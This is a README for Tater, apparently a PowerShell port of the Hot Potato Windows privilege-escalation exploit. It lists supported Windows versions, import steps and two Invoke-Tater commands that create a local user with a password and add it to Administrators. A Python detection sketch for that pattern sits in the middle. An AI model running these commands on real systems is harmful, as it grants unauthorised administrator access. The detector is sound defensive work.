Tater

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesec.

Credit

All credit goes to @breenmachine, @foxglovesec, Google Project Zero, and anyone else that helped work out the details for this exploit.

Potato - https://github.com/foxglovesec/Potato

Notes

This version has been successful for me on Windows 7, Windows 8.1, Windows 10, and Windows Server 2012 R2. I will hopefully be able to test it on Windows Server 2008 soon. Feel free to open issues here or reach out on Twitter @kevin_robertson with successes or failures for the remaining OS versions.

Usage

To import with Import-Module:
Import-Module ./Tater.ps1

To import using dot source method:
. ./Tater.ps1

Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
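
For defenders, the two invocations above leave a recognisable command line in process-creation and PowerShell script-block logs. The following Python sketch is an added example, not part of Tater or its README: the event records are constructed, and the rule names and function names are hypothetical.

```python
import re

# Constructed (host, command line) records shaped like process-creation or
# PowerShell script-block log entries; none come from a real system.
SAMPLE_EVENTS = [
    ("WS01", 'Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add '
             '&& net localgroup administrators tater /add"'),
    ("WS01", "cmd.exe /c net  USER tater Winter2016 /ADD "
             "&& net localgroup Administrators tater /add"),
    ("WS02", "net user alice"),                                    # lookup only
    ("WS03", "net1.exe localgroup administrators helpdesk /add"),  # no account creation
]

NET = r"\bnet1?(?:\.exe)?\s+"
TATER = re.compile(r"\bInvoke-Tater\b.*?-Trigger\s+(\d+)", re.I)
# Group 1 = account name, group 2 = optional password argument.
USER_ADD = re.compile(NET + r"user\s+(\S+)(?:\s+(?!/)(\S+))?\s+/add\b", re.I)
ADMIN_ADD = re.compile(NET + r"localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)


def redact(cmd):
    """Mask the password argument so the alert does not carry the credential."""
    def mask(m):
        if m.group(2) is None:
            return m.group(0)
        start, end = m.span(2)
        return cmd[m.start():start] + "<redacted>" + cmd[end:m.end()]
    return USER_ADD.sub(mask, cmd)


def detect(events):
    """Return (host, rule hits, redacted command line) for each suspicious record."""
    findings = []
    for host, cmd in events:
        hits = []
        tater = TATER.search(cmd)
        if tater:
            hits.append(f"invoke-tater(trigger={tater.group(1)})")
        # Flag only accounts that are created AND added to Administrators in the
        # same command line, the pattern used in the usage examples.
        created = {m.group(1).lower() for m in USER_ADD.finditer(cmd)}
        promoted = {m.group(1).lower() for m in ADMIN_ADD.finditer(cmd)}
        hits += [f"new-local-admin({name})" for name in sorted(created & promoted)]
        if hits:
            findings.append((host, hits, redact(cmd)))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The correlation is per command line only; an account created in one process and promoted in another needs a time-window join on the host, which this sketch does not do.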

Screenshots

Windows 7 using trigger 1 (NBNS WPAD Bruteforce + Windows Defender Signature Updates)

Windows 10 using trigger 2 (WebClient Service + Scheduled Task)

Windows 7 using trigger 1 and UDP port exhaustion

Top Contributors

Kevin-Robertson